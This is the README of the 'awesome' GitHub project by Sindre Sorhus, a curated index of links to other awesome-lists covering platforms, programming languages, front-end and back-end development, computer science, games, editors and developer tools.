<sub>Just type <a href="https://awesome.re"><code>awesome.re</code></a> to go here. Check out my <a href="https://blog.sindresorhus.com">blog</a> and follow me on <a href="https://twitter.com/sindresorhus">Twitter</a>.</sub>
</p>
<br>
<div align="center">
<h2>
<a href="https://www.producthunt.com/posts/system-color-picker">My color picker app is on Product Hunt</a>
</h2>
</div>
## Contents
- [Platforms](#platforms)
- [Programming Languages](#programming-languages)
- [Front-End Development](#front-end-development)
- [Back-End Development](#back-end-development)
- [Computer Science](#computer-science)
- [Big Data](#big-data)
- [Theory](#theory)
- [Books](#books)
- [Editors](#editors)
- [Gaming](#gaming)
- [Development Environment](#development-environment)
- [Entertainment](#entertainment)
- [Databases](#databases)
- [Media](#media)
- [Learn](#learn)
- [Security](#security)
- [Content Management Systems](#content-management-systems)
- [Hardware](#hardware)
- [Business](#business)
- [Work](#work)
- [Networking](#networking)
- [Decentralized Systems](#decentralized-systems)
- [Higher Education](#higher-education)
- [Events](#events)
- [Testing](#testing)
- [Miscellaneous](#miscellaneous)
- [Related](#related)
## Platforms
- [Node.js](https://github.com/sindresorhus/awesome-nodejs#readme) - Async non-blocking event-driven JavaScript runtime built on Chrome's V8 JavaScript engine.
- [Cross-Platform](https://github.com/bcoe/awesome-cross-platform-nodejs#readme) - Writing cross-platform code on Node.js.
- [Frontend Development](https://github.com/dypsilon/frontend-dev-bookmarks#readme)
- [iOS](https://github.com/vsouza/awesome-ios#readme) - Mobile operating system for Apple phones and tablets.
- [Android](https://github.com/JStumpp/awesome-android#readme) - Mobile operating system developed by Google.
- [IoT & Hybrid Apps](https://github.com/weblancaster/awesome-IoT-hybrid#readme)
- [Electron](https://github.com/sindresorhus/awesome-electron#readme) - Cross-platform native desktop apps using JavaScript/HTML/CSS.
- [Cordova](https://github.com/busterc/awesome-cordova#readme) - JavaScript API for hybrid apps.
- [React Native](https://github.com/jondot/awesome-react-native#readme) - JavaScript framework for writing natively rendering mobile apps for iOS and Android.
- [Xamarin](https://github.com/XamSome/awesome-xamarin#readme) - Mobile app development IDE, testing, and distribution.
- [Linux](https://github.com/inputsh/awesome-linux#readme)
- [Containers](https://github.com/Friz-zy/awesome-linux-containers#readme)
- [eBPF](https://github.com/zoidbergwill/awesome-ebpf#readme) - Virtual machine that allows you to write more efficient and powerful tracing and monitoring for Linux systems.
- [Arch-based Projects](https://github.com/PandaFoss/Awesome-Arch#readme) - Linux distributions and projects based on Arch Linux.
- [macOS](https://github.com/iCHAIT/awesome-macOS#readme) - Operating system for Apple's Mac computers.
- [Command-Line](https://github.com/herrbischoff/awesome-macos-command-line#readme)
- [Screensavers](https://github.com/agarrharr/awesome-macos-screensavers#readme)
- [Apps](https://github.com/jaywcjlove/awesome-mac#readme)
- [Open Source Apps](https://github.com/serhii-londar/open-source-mac-os-apps#readme)
- [watchOS](https://github.com/yenchenlin/awesome-watchos#readme) - Operating system for the Apple Watch.
- [JVM](https://github.com/deephacks/awesome-jvm#readme)
- [Salesforce](https://github.com/mailtoharshit/awesome-salesforce#readme)
- [Amazon Web Services](https://github.com/donnemartin/awesome-aws#readme)
- [Windows](https://github.com/Awesome-Windows/Awesome#readme)
- [IPFS](https://github.com/ipfs/awesome-ipfs#readme) - P2P hypermedia protocol.
- [Fuse](https://github.com/fuse-compound/awesome-fuse#readme) - Mobile development tools.
- [Heroku](https://github.com/ianstormtaylor/awesome-heroku#readme) - Cloud platform as a service.
- [Raspberry Pi](https://github.com/thibmaek/awesome-raspberry-pi#readme) - Credit card-sized computer aimed at teaching kids programming, but capable of a lot more.
- [Qt](https://github.com/JesseTG/awesome-qt#readme) - Cross-platform GUI app framework.
- [WebExtensions](https://github.com/fregante/Awesome-WebExtensions#readme) - Cross-browser extension system.
- [RubyMotion](https://github.com/motion-open-source/awesome-rubymotion#readme) - Write cross-platform native apps for iOS, Android, macOS, tvOS, and watchOS in Ruby.
- [Smart TV](https://github.com/vitalets/awesome-smart-tv#readme) - Create apps for different TV platforms.
- [GNOME](https://github.com/Kazhnuz/awesome-gnome#readme) - Simple and distraction-free desktop environment for Linux.
- [KDE](https://github.com/francoism90/awesome-kde#readme) - A free software community dedicated to creating an open and user-friendly computing experience.
- [.NET](https://github.com/quozd/awesome-dotnet#readme)
- [Core](https://github.com/thangchung/awesome-dotnet-core#readme)
- [Roslyn](https://github.com/ironcev/awesome-roslyn#readme) - Open-source compilers and code analysis APIs for C# and VB.NET languages.
- [Amazon Alexa](https://github.com/miguelmota/awesome-amazon-alexa#readme) - Virtual home assistant.
- [DigitalOcean](https://github.com/jonleibowitz/awesome-digitalocean#readme) - Cloud computing platform designed for developers.
- [Flutter](https://github.com/Solido/awesome-flutter#readme) - Google's mobile SDK for building native iOS and Android apps from a single codebase written in Dart.
- [Home Assistant](https://github.com/frenck/awesome-home-assistant#readme) - Open source home automation that puts local control and privacy first.
- [IBM Cloud](https://github.com/victorshinya/awesome-ibmcloud#readme) - Cloud platform for developers and companies.
- [Firebase](https://github.com/jthegedus/awesome-firebase#readme) - App development platform built on Google Cloud Platform.
- [Robot Operating System 2.0](https://github.com/fkromer/awesome-ros2#readme) - Set of software libraries and tools that help you build robot apps.
- [Adafruit IO](https://github.com/adafruit/awesome-adafruitio#readme) - Visualize and store data from any device.
- [Cloudflare](https://github.com/irazasyed/awesome-cloudflare#readme) - CDN, DNS, DDoS protection, and security for your site.
- [Actions on Google](https://github.com/ravirupareliya/awesome-actions-on-google#readme) - Developer platform for Google Assistant.
- [ESP](https://github.com/agucova/awesome-esp#readme) - Low-cost microcontrollers with WiFi and broad IoT applications.
- [Deno](https://github.com/denolib/awesome-deno#readme) - A secure runtime for JavaScript and TypeScript that uses V8 and is built in Rust.
- [DOS](https://github.com/balintkissdev/awesome-dos#readme) - Operating system for x86-based personal computers that was popular during the 1980s and early 1990s.
- [Nix](https://github.com/nix-community/awesome-nix#readme) - Package manager for Linux and other Unix systems that makes package management reliable and reproducible.
## Programming Languages
- [JavaScript](https://github.com/sorrycc/awesome-javascript#readme)
- [Promises](https://github.com/wbinnssmith/awesome-promises#readme)
- [Standard Style](https://github.com/standard/awesome-standard#readme) - Style guide and linter.
- [Must Watch Talks](https://github.com/bolshchikov/js-must-watch#readme)
- [Tips](https://github.com/loverajoel/jstips#readme)
- [Network Layer](https://github.com/Kikobeats/awesome-network-js#readme)
- [Micro npm Packages](https://github.com/parro-it/awesome-micro-npm-packages#readme)
- [Mad Science npm Packages](https://github.com/feross/awesome-mad-science#readme) - Impossible sounding projects that exist.
- [Maintenance Modules](https://github.com/maxogden/maintenance-modules#readme) - For npm packages.
- [npm](https://github.com/sindresorhus/awesome-npm#readme) - Package manager.
- [AVA](https://github.com/avajs/awesome-ava#readme) - Test runner.
- [ESLint](https://github.com/dustinspecker/awesome-eslint#readme) - Linter.
- [Functional Programming](https://github.com/stoeffel/awesome-fp-js#readme)
- [Observables](https://github.com/sindresorhus/awesome-observables#readme)
- [npm scripts](https://github.com/RyanZim/awesome-npm-scripts#readme) - Task runner.
- [30 Seconds of Code](https://github.com/30-seconds/30-seconds-of-code#readme) - Code snippets you can understand in 30 seconds.
- [Ponyfills](https://github.com/Richienb/awesome-ponyfills#readme) - Like polyfills but without overriding native APIs.
- [Swift](https://github.com/matteocrippa/awesome-swift#readme) - Apple's compiled programming language that is secure, modern, programmer-friendly, and fast.
- [Education](https://github.com/hsavit1/Awesome-Swift-Education#readme)
- [Playgrounds](https://github.com/uraimo/Awesome-Swift-Playgrounds#readme)
- [Python](https://github.com/vinta/awesome-python#readme) - General-purpose programming language designed for readability.
- [Asyncio](https://github.com/timofurrer/awesome-asyncio#readme) - Asynchronous I/O in Python 3.
- [Scientific Audio](https://github.com/faroit/awesome-python-scientific-audio#readme) - Scientific research in audio/music.
- [CircuitPython](https://github.com/adafruit/awesome-circuitpython#readme) - A version of Python for microcontrollers.
- [Data Science](https://github.com/krzjoa/awesome-python-data-science#readme) - Data analysis and machine learning.
- [Typing](https://github.com/typeddjango/awesome-python-typing#readme) - Optional static typing for Python.
- [MicroPython](https://github.com/mcauser/awesome-micropython#readme) - A lean and efficient implementation of Python 3 for microcontrollers.
- [Rust](https://github.com/rust-unofficial/awesome-rust#readme)
- [Haskell](https://github.com/krispo/awesome-haskell#readme)
- [PureScript](https://github.com/passy/awesome-purescript#readme)
- [Go](https://github.com/avelino/awesome-go#readme)
- [Scala](https://github.com/lauris/awesome-scala#readme)
- [Scala Native](https://github.com/tindzk/awesome-scala-native#readme) - Optimizing ahead-of-time compiler for Scala based on LLVM.
- [Ruby](https://github.com/markets/awesome-ruby#readme)
- [Clojure](https://github.com/razum2um/awesome-clojure#readme)
- [ClojureScript](https://github.com/hantuzun/awesome-clojurescript#readme)
- [Elixir](https://github.com/h4cc/awesome-elixir#readme)
- [Elm](https://github.com/sporto/awesome-elm#readme)
- [Erlang](https://github.com/drobakowski/awesome-erlang#readme)
- [Julia](https://github.com/svaksha/Julia.jl#readme) - High-level dynamic programming language designed to address the needs of high-performance numerical analysis and computational science.
- [Lua](https://github.com/LewisJEllis/awesome-lua#readme)
- [C](https://github.com/inputsh/awesome-c#readme)
- [C/C++](https://github.com/fffaraz/awesome-cpp#readme) - General-purpose language with a bias toward system programming and embedded, resource-constrained software.
- [R](https://github.com/qinwf/awesome-R#readme) - Functional programming language and environment for statistical computing and graphics.
- [Learning](https://github.com/iamericfletcher/awesome-r-learning-resources#readme)
- [D](https://github.com/dlang-community/awesome-d#readme)
- [Common Lisp](https://github.com/CodyReichert/awesome-cl#readme) - Powerful dynamic multiparadigm language that facilitates iterative and interactive development.
- [Learning](https://github.com/GustavBertram/awesome-common-lisp-learning#readme)
- [Perl](https://github.com/hachiojipm/awesome-perl#readme)
- [Groovy](https://github.com/kdabir/awesome-groovy#readme)
- [Dart](https://github.com/yissachar/awesome-dart#readme)
- [Java](https://github.com/akullpp/awesome-java#readme) - Popular secure object-oriented language designed for flexibility to "write once, run anywhere".
- [RxJava](https://github.com/eleventigers/awesome-rxjava#readme)
- [Kotlin](https://github.com/KotlinBy/awesome-kotlin#readme)
- [OCaml](https://github.com/ocaml-community/awesome-ocaml#readme)
- [ColdFusion](https://github.com/seancoyne/awesome-coldfusion#readme)
- [Fortran](https://github.com/rabbiabram/awesome-fortran#readme)
- [PHP](https://github.com/ziadoz/awesome-php#readme) - Server-side scripting language.
- [Composer](https://github.com/jakoch/awesome-composer#readme) - Package manager.
- [Pascal](https://github.com/Fr0sT-Brutal/awesome-pascal#readme)
- [AutoHotkey](https://github.com/ahkscript/awesome-AutoHotkey#readme)
- [AutoIt](https://github.com/J2TeaM/awesome-AutoIt#readme)
- [Crystal](https://github.com/veelenga/awesome-crystal#readme)
- [Frege](https://github.com/sfischer13/awesome-frege#readme) - Haskell for the JVM.
- [CMake](https://github.com/onqtam/awesome-cmake#readme) - Build, test, and package software.
- [ActionScript 3](https://github.com/robinrodricks/awesome-actionscript3#readme) - Object-oriented language targeting Adobe AIR.
- [Eta](https://github.com/sfischer13/awesome-eta#readme) - Functional programming language for the JVM.
- [Idris](https://github.com/joaomilho/awesome-idris#readme) - General purpose pure functional programming language with dependent types influenced by Haskell and ML.
- [Ada/SPARK](https://github.com/ohenley/awesome-ada#readme) - Modern programming language designed for large, long-lived apps where reliability and efficiency are essential.
- [Q#](https://github.com/ebraminio/awesome-qsharp#readme) - Domain-specific programming language used for expressing quantum algorithms.
- [Imba](https://github.com/koolamusic/awesome-imba#readme) - Programming language inspired by Ruby and Python and compiles to performant JavaScript.
- [Vala](https://github.com/desiderantes/awesome-vala#readme) - Programming language designed to take full advantage of the GLib and GNOME ecosystems, while preserving the speed of C code.
- [Coq](https://github.com/coq-community/awesome-coq#readme) - Formal language and environment for programming and specification which facilitates interactive development of machine-checked proofs.
- [V](https://github.com/vlang/awesome-v#readme) - Simple, fast, safe, compiled language for developing maintainable software.
## Front-End Development
- [ES6 Tools](https://github.com/addyosmani/es6-tools#readme)
- [Web Performance Optimization](https://github.com/davidsonfellipe/awesome-wpo#readme)
- [Web Tools](https://github.com/lvwzhen/tools#readme)
- [CSS](https://github.com/awesome-css-group/awesome-css#readme) - Style sheet language that specifies how HTML elements are displayed on screen.
- [Critical-Path Tools](https://github.com/addyosmani/critical-path-css-tools#readme)
- [Scalability](https://github.com/davidtheclark/scalable-css-reading-list#readme)
- [Must-Watch Talks](https://github.com/AllThingsSmitty/must-watch-css#readme)
- [Protips](https://github.com/AllThingsSmitty/css-protips#readme)
- [Frameworks](https://github.com/troxler/awesome-css-frameworks#readme)
- [React](https://github.com/enaqx/awesome-react#readme) - App framework.
- [Relay](https://github.com/expede/awesome-relay#readme) - Framework for building data-driven React apps.
- [React Hooks](https://github.com/glauberfc/awesome-react-hooks#readme) - A new feature that lets you use state and other React features without writing a class.
- [Web Components](https://github.com/mateusortiz/webcomponents-the-right-way#readme)
- [Polymer](https://github.com/Granze/awesome-polymer#readme) - JavaScript library to develop Web Components.
- [Angular](https://github.com/PatrickJS/awesome-angular#readme) - App framework.
- [Backbone](https://github.com/sadcitizen/awesome-backbone#readme) - App framework.
- [HTML5](https://github.com/diegocard/awesome-html5#readme) - Markup language used for websites & web apps.
- [SVG](https://github.com/willianjusten/awesome-svg#readme) - XML-based vector image format.
- [Canvas](https://github.com/raphamorim/awesome-canvas#readme)
- [KnockoutJS](https://github.com/dnbard/awesome-knockout#readme) - JavaScript library.
- [Dojo Toolkit](https://github.com/petk/awesome-dojo#readme) - JavaScript toolkit.
- [Inspiration](https://github.com/NoahBuscher/Inspire#readme)
- [Ember](https://github.com/ember-community-russia/awesome-ember#readme) - App framework.
- [Android UI](https://github.com/wasabeef/awesome-android-ui#readme)
- [iOS UI](https://github.com/cjwirth/awesome-ios-ui#readme)
- [Meteor](https://github.com/Urigo/awesome-meteor#readme)
- [BEM](https://github.com/sturobson/BEM-resources#readme)
- [Flexbox](https://github.com/afonsopacifer/awesome-flexbox#readme)
- [Web Typography](https://github.com/deanhume/typography#readme)
- [Web Accessibility](https://github.com/brunopulis/awesome-a11y#readme)
- [Material Design](https://github.com/sachin1092/awesome-material#readme)
- [D3](https://github.com/wbkd/awesome-d3#readme) - Library for producing dynamic, interactive data visualizations.
- [Emails](https://github.com/jonathandion/awesome-emails#readme)
- [jQuery](https://github.com/petk/awesome-jquery#readme) - Easy to use JavaScript library for DOM manipulation.
- [Tips](https://github.com/AllThingsSmitty/jquery-tips-everyone-should-know#readme)
- [Web Audio](https://github.com/notthetup/awesome-webaudio#readme)
- [Offline-First](https://github.com/pazguille/offline-first#readme)
- [Static Website Services](https://github.com/agarrharr/awesome-static-website-services#readme)
- [Cycle.js](https://github.com/cyclejs-community/awesome-cyclejs#readme) - Functional and reactive JavaScript framework.
- [Text Editing](https://github.com/dok/awesome-text-editing#readme)
- [Motion UI Design](https://github.com/fliptheweb/motion-ui-design#readme)
- [Vue.js](https://github.com/vuejs/awesome-vue#readme) - App framework.
- [Marionette.js](https://github.com/sadcitizen/awesome-marionette#readme) - App framework.
- [Aurelia](https://github.com/aurelia-contrib/awesome-aurelia#readme) - App framework.
- [Charting](https://github.com/zingchart/awesome-charting#readme)
- [Ionic Framework 2](https://github.com/candelibas/awesome-ionic#readme)
- [Chrome DevTools](https://github.com/ChromeDevTools/awesome-chrome-devtools#readme)
- [PostCSS](https://github.com/jdrgomes/awesome-postcss#readme) - CSS tool.
- [Draft.js](https://github.com/nikgraf/awesome-draft-js#readme) - Rich text editor framework for React.
- [Service Workers](https://github.com/TalAter/awesome-service-workers#readme)
- [Progressive Web Apps](https://github.com/TalAter/awesome-progressive-web-apps#readme)
- [choo](https://github.com/choojs/awesome-choo#readme) - App framework.
- [Redux](https://github.com/brillout/awesome-redux#readme) - State container for JavaScript apps.
- [webpack](https://github.com/webpack-contrib/awesome-webpack#readme) - Module bundler.
- [Browserify](https://github.com/browserify/awesome-browserify#readme) - Module bundler.
- [Sass](https://github.com/Famolus/awesome-sass#readme) - CSS preprocessor.
- [Ant Design](https://github.com/websemantics/awesome-ant-design#readme) - Enterprise-class UI design language.
- [Less](https://github.com/LucasBassetti/awesome-less#readme) - CSS preprocessor.
- [WebGL](https://github.com/sjfricke/awesome-webgl#readme) - JavaScript API for rendering 3D graphics.
- [Preact](https://github.com/preactjs/awesome-preact#readme) - App framework.
- [Progressive Enhancement](https://github.com/jbmoelker/progressive-enhancement-resources#readme)
- [Next.js](https://github.com/unicodeveloper/awesome-nextjs#readme) - Framework for server-rendered React apps.
- [lit-html](https://github.com/web-padawan/awesome-lit-html#readme) - HTML templating library for JavaScript.
- [JAMstack](https://github.com/automata/awesome-jamstack#readme) - Modern web development architecture based on client-side JavaScript, reusable APIs, and prebuilt markup.
- [WordPress-Gatsby](https://github.com/henrikwirth/awesome-wordpress-gatsby#readme) - Web development technology stack with WordPress as a back end and Gatsby as a front end.
- [Mobile Web Development](https://github.com/myshov/awesome-mobile-web-development#readme) - Creating a great mobile web experience.
- [Storybook](https://github.com/lauthieb/awesome-storybook#readme) - Development environment for UI components.
- [Blazor](https://github.com/AdrienTorris/awesome-blazor#readme) - .NET web framework using C#/Razor and HTML that runs in the browser with WebAssembly.
- [PageSpeed Metrics](https://github.com/csabapalfi/awesome-pagespeed-metrics#readme) - Metrics to help understand page speed and user experience.
- [Tailwind CSS](https://github.com/aniftyco/awesome-tailwindcss#readme) - Utility-first CSS framework for rapid UI development.
- [Seed](https://github.com/seed-rs/awesome-seed-rs#readme) - Rust framework for creating web apps running in WebAssembly.
- [Web Performance Budget](https://github.com/pajaydev/awesome-web-performance-budget#readme) - Techniques to ensure certain performance metrics for a website.
- [Web Animation](https://github.com/sergey-pimenov/awesome-web-animation#readme) - Animations in the browser with JavaScript, CSS, SVG, etc.
- [Yew](https://github.com/jetli/awesome-yew#readme) - Rust framework inspired by Elm and React for creating multi-threaded frontend web apps with WebAssembly.
- [Material-UI](https://github.com/nadunindunil/awesome-material-ui#readme) - Material Design React components for faster and easier web development.
- [Building Blocks for Web Apps](https://github.com/componently-com/awesome-building-blocks-for-web-apps#readme) - Standalone features to be integrated into web apps.
- [Svelte](https://github.com/TheComputerM/awesome-svelte#readme) - App framework.
- [Design systems](https://github.com/klaufel/awesome-design-systems#readme) - Collection of reusable components, guided by rules that ensure consistency and speed.
- [Inertia.js](https://github.com/innocenzi/awesome-inertiajs#readme) - Make single-page apps without building an API.
## Back-End Development
- [Flask](https://github.com/mjhea0/awesome-flask#readme) - Python framework.
- [Docker](https://github.com/veggiemonk/awesome-docker#readme)
- [Vagrant](https://github.com/iJackUA/awesome-vagrant#readme) - Automation virtual machine environment.
- [Pyramid](https://github.com/uralbash/awesome-pyramid#readme) - Python framework.
- [Play1 Framework](https://github.com/PerfectCarl/awesome-play1#readme)
- [CakePHP](https://github.com/friendsofcake/awesome-cakephp#readme) - PHP framework.
- [Symfony](https://github.com/sitepoint-editors/awesome-symfony#readme) - PHP framework.
- [Education](https://github.com/pehapkari/awesome-symfony-education#readme)
- [Laravel](https://github.com/chiraggude/awesome-laravel#readme) - PHP framework.
- [Education](https://github.com/fukuball/Awesome-Laravel-Education#readme)
- [TALL Stack](https://github.com/blade-ui-kit/awesome-tall-stack#readme) - Full-stack development solution featuring libraries built by the Laravel community.
- [Rails](https://github.com/gramantin/awesome-rails#readme) - Web app framework for Ruby.
- [Gems](https://github.com/hothero/awesome-rails-gem#readme) - Packages.
- [Phalcon](https://github.com/phalcon/awesome-phalcon#readme) - PHP framework.
- [Useful `.htaccess` Snippets](https://github.com/phanan/htaccess#readme)
- [nginx](https://github.com/fcambus/nginx-resources#readme) - Web server.
- [Dropwizard](https://github.com/stve/awesome-dropwizard#readme) - Java framework.
- [Kubernetes](https://github.com/ramitsurana/awesome-kubernetes#readme) - Open-source platform that automates Linux container operations.
- [Lumen](https://github.com/unicodeveloper/awesome-lumen#readme) - PHP micro-framework.
- [Serverless Framework](https://github.com/pmuens/awesome-serverless#readme) - Serverless computing and serverless architectures.
- [Apache Wicket](https://github.com/PhantomYdn/awesome-wicket#readme) - Java web app framework.
- [Vert.x](https://github.com/vert-x3/vertx-awesome#readme) - Toolkit for building reactive apps on the JVM.
- [Terraform](https://github.com/shuaibiyy/awesome-terraform#readme) - Tool for building, changing, and versioning infrastructure.
- [Vapor](https://github.com/Cellane/awesome-vapor#readme) - Server-side development in Swift.
- [Dash](https://github.com/ucg8j/awesome-dash#readme) - Python web app framework.
- [FastAPI](https://github.com/mjhea0/awesome-fastapi#readme) - Python web app framework.
- [CDK](https://github.com/kolomied/awesome-cdk#readme) - Open-source software development framework for defining cloud infrastructure in code.
- [IAM](https://github.com/kdeldycke/awesome-iam#readme) - User accounts, authentication and authorization.
## Computer Science
- [University Courses](https://github.com/prakhar1989/awesome-courses#readme)
- [Data Science](https://github.com/academic/awesome-datascience#readme)
- [Tutorials](https://github.com/siboehm/awesome-learn-datascience#readme)
- [Machine Learning](https://github.com/josephmisiti/awesome-machine-learning#readme)
- [Tutorials](https://github.com/ujjwalkarn/Machine-Learning-Tutorials#readme)
- [ML with Ruby](https://github.com/arbox/machine-learning-with-ruby#readme) - Learning, implementing, and applying Machine Learning using Ruby.
- [Core ML Models](https://github.com/likedan/Awesome-CoreML-Models#readme) - Models for Apple's machine learning framework.
- [H2O](https://github.com/h2oai/awesome-h2o#readme) - Open source distributed machine learning platform written in Java with APIs in R, Python, and Scala.
- [Software Engineering for Machine Learning](https://github.com/SE-ML/awesome-seml#readme) - From experiment to production-level machine learning.
- [AI in Finance](https://github.com/georgezouq/awesome-ai-in-finance#readme) - Solving problems in finance with machine learning.
- [JAX](https://github.com/n2cholas/awesome-jax#readme) - Automatic differentiation and XLA compilation brought together for high-performance machine learning research.
- [XAI](https://github.com/altamiracorp/awesome-xai#readme) - Providing insight, explanations, and interpretability to machine learning methods.
- [Speech and Natural Language Processing](https://github.com/edobashira/speech-language-processing#readme)
- [Spanish](https://github.com/dav009/awesome-spanish-nlp#readme)
- [NLP with Ruby](https://github.com/arbox/nlp-with-ruby#readme)
- [Question Answering](https://github.com/seriousran/awesome-qa#readme) - The science of asking and answering in natural language with a machine.
- [Natural Language Generation](https://github.com/tokenmill/awesome-nlg#readme) - Generation of text used in data to text, conversational agents, and narrative generation applications.
- [Linguistics](https://github.com/theimpossibleastronaut/awesome-linguistics#readme)
- [Cryptography](https://github.com/sobolevn/awesome-cryptography#readme)
- [Papers](https://github.com/pFarb/awesome-crypto-papers#readme) - Theory basics for using cryptography by non-cryptographers.
- [Computer Vision](https://github.com/jbhuang0604/awesome-computer-vision#readme)
- [Deep Learning](https://github.com/ChristosChristofidis/awesome-deep-learning#readme) - Neural networks.
- [TensorFlow](https://github.com/jtoy/awesome-tensorflow#readme) - Library for machine intelligence.
- [TensorFlow.js](https://github.com/aaronhma/awesome-tensorflow-js#readme) - WebGL-accelerated machine learning JavaScript library for training and deploying models.
- [TensorFlow Lite](https://github.com/margaretmz/awesome-tensorflow-lite#readme) - Framework that optimizes TensorFlow models for on-device machine learning.
- [Papers](https://github.com/terryum/awesome-deep-learning-papers#readme) - The most cited deep learning papers.
- [Education](https://github.com/guillaume-chevalier/awesome-deep-learning-resources#readme)
- [Deep Vision](https://github.com/kjw0612/awesome-deep-vision#readme)
- [Open Source Society University](https://github.com/ossu/computer-science#readme)
- [Functional Programming](https://github.com/lucasviola/awesome-functional-programming#readme)
- [Empirical Software Engineering](https://github.com/dspinellis/awesome-msr#readme) - Evidence-based research on software systems.
- [Static Analysis & Code Quality](https://github.com/analysis-tools-dev/static-analysis#readme)
- [Information Retrieval](https://github.com/harpribot/awesome-information-retrieval#readme) - Learn to develop your own search engine.
- [Quantum Computing](https://github.com/desireevl/awesome-quantum-computing#readme) - Computing which utilizes quantum mechanics and qubits on quantum computers.
## Big Data
- [Big Data](https://github.com/onurakpolat/awesome-bigdata#readme)
- [Public Datasets](https://github.com/awesomedata/awesome-public-datasets#readme)
- [Hadoop](https://github.com/youngwookim/awesome-hadoop#readme) - Framework for distributed storage and processing of very large data sets.
- [Data Engineering](https://github.com/igorbarinov/awesome-data-engineering#readme)
- [Streaming](https://github.com/manuzhang/awesome-streaming#readme)
- [Apache Spark](https://github.com/awesome-spark/awesome-spark#readme) - Unified engine for large-scale data processing.
- [Qlik](https://github.com/ambster-public/awesome-qlik#readme) - Business intelligence platform for data visualization, analytics, and reporting apps.
- [Splunk](https://github.com/sduff/awesome-splunk#readme) - Platform for searching, monitoring, and analyzing structured and unstructured machine-generated big data in real-time.
## Theory
- [Papers We Love](https://github.com/papers-we-love/papers-we-love#readme)
- [Talks](https://github.com/JanVanRyswyck/awesome-talks#readme)
- [Algorithms](https://github.com/tayllan/awesome-algorithms#readme)
- [Education](https://github.com/gaerae/awesome-algorithms-education#readme) - Learning and practicing.
- [Algorithm Visualizations](https://github.com/enjalot/algovis#readme)
- [Artificial Intelligence](https://github.com/owainlewis/awesome-artificial-intelligence#readme)
- [Search Engine Optimization](https://github.com/marcobiedermann/search-engine-optimization#readme)
- [Competitive Programming](https://github.com/lnishan/awesome-competitive-programming#readme)
- [Math](https://github.com/rossant/awesome-math#readme)
- [Recursion Schemes](https://github.com/passy/awesome-recursion-schemes#readme) - Traversing nested data structures.
## Books
- [Free Programming Books](https://github.com/EbookFoundation/free-programming-books#readme)
- [Go Books](https://github.com/dariubs/GoBooks#readme)
- [R Books](https://github.com/RomanTsegelskyi/rbooks#readme)
- [Mind Expanding Books](https://github.com/hackerkid/Mind-Expanding-Books#readme)
- [Book Authoring](https://github.com/TalAter/awesome-book-authoring#readme)
- [Elixir Books](https://github.com/sger/ElixirBooks#readme)
## Editors
- [Sublime Text](https://github.com/dreikanter/sublime-bookmarks#readme)
- [Vim](https://github.com/mhinz/vim-galore#readme)
- [Emacs](https://github.com/emacs-tw/awesome-emacs#readme)
- [Atom](https://github.com/mehcode/awesome-atom#readme) - Open-source and hackable text editor.
- [Visual Studio Code](https://github.com/viatsko/awesome-vscode#readme) - Cross-platform open-source text editor.
## Gaming
- [Game Development](https://github.com/ellisonleao/magictools#readme)
- [Game Talks](https://github.com/hzoo/awesome-gametalks#readme)
- [Godot](https://github.com/Calinou/awesome-godot#readme) - Game engine.
- [Open Source Games](https://github.com/leereilly/games#readme)
- [Unity](https://github.com/RyanNielson/awesome-unity#readme) - Game engine.
- [Chess](https://github.com/hkirat/awesome-chess#readme)
- [LÖVE](https://github.com/love2d-community/awesome-love2d#readme) - Game engine.
- [PICO-8](https://github.com/pico-8/awesome-PICO-8#readme) - Fantasy console.
- [Game Boy Development](https://github.com/gbdev/awesome-gbdev#readme)
- [Construct 2](https://github.com/WebCreationClub/awesome-construct#readme) - Game engine.
- [Gideros](https://github.com/stetso/awesome-gideros#readme) - Game engine.
- [Minecraft](https://github.com/bs-community/awesome-minecraft#readme) - Sandbox video game.
- [Game Datasets](https://github.com/leomaurodesenv/game-datasets#readme) - Materials and datasets for Artificial Intelligence in games.
- [Haxe Game Development](https://github.com/Dvergar/awesome-haxe-gamedev#readme) - A high-level strongly typed programming language used to produce cross-platform native code.
- [libGDX](https://github.com/rafaskb/awesome-libgdx#readme) - Java game framework.
- [PlayCanvas](https://github.com/playcanvas/awesome-playcanvas#readme) - Game engine.
- [Game Remakes](https://github.com/radek-sprta/awesome-game-remakes#readme) - Actively maintained open-source game remakes.
- [Flame](https://github.com/flame-engine/awesome-flame#readme) - Game engine for Flutter.
- [Discord Communities](https://github.com/mhxion/awesome-discord-communities#readme) - Chat with friends and communities.
- [CHIP-8](https://github.com/tobiasvl/awesome-chip-8#readme) - Virtual computer game machine from the 70s.
- [Games of Coding](https://github.com/michelpereira/awesome-games-of-coding#readme) - Learn a programming language by making games.
## Development Environment
- [Quick Look Plugins](https://github.com/sindresorhus/quick-look-plugins#readme) - For macOS.
- [Dev Env](https://github.com/jondot/awesome-devenv#readme)
- [Dotfiles](https://github.com/webpro/awesome-dotfiles#readme)
- [Shell](https://github.com/alebcay/awesome-shell#readme)
- [Fish](https://github.com/jorgebucaran/awsm.fish#readme) - User-friendly shell.
- [Command-Line Apps](https://github.com/agarrharr/awesome-cli-apps#readme)
- [ZSH Plugins](https://github.com/unixorn/awesome-zsh-plugins#readme)
- [GitHub](https://github.com/phillipadsmith/awesome-github#readme) - Hosting service for Git repositories.
- [Browser Extensions](https://github.com/stefanbuck/awesome-browser-extensions-for-github#readme)
- [Cheat Sheet](https://github.com/tiimgreen/github-cheat-sheet#readme)
- [Pinned Gists](https://github.com/matchai/awesome-pinned-gists#readme) - Dynamic pinned gists for your GitHub profile.
- [Git Cheat Sheet & Git Flow](https://github.com/arslanbilal/git-cheat-sheet#readme)
- [Git Tips](https://github.com/git-tips/tips#readme)
- [Git Add-ons](https://github.com/stevemao/awesome-git-addons#readme) - Enhance the `git` CLI.
- [Git Hooks](https://github.com/compscilauren/awesome-git-hooks#readme) - Scripts for automating tasks during `git` workflows.
- [SSH](https://github.com/moul/awesome-ssh#readme)
- [FOSS for Developers](https://github.com/tvvocold/FOSS-for-Dev#readme)
- [Hyper](https://github.com/bnb/awesome-hyper#readme) - Cross-platform terminal app built on web technologies.
- [PowerShell](https://github.com/janikvonrotz/awesome-powershell#readme) - Cross-platform object-oriented shell.
- [Alfred Workflows](https://github.com/alfred-workflows/awesome-alfred-workflows#readme) - Productivity app for macOS.
- [Terminals Are Sexy](https://github.com/k4m4/terminals-are-sexy#readme)
- [GitHub Actions](https://github.com/sdras/awesome-actions#readme) - Create tasks to automate your workflow and share them with others on GitHub.
## Entertainment
- [Science Fiction](https://github.com/sindresorhus/awesome-scifi#readme) - Scifi.
- [Fantasy](https://github.com/RichardLitt/awesome-fantasy#readme)
- [Podcasts](https://github.com/ayr-ton/awesome-geek-podcasts#readme)
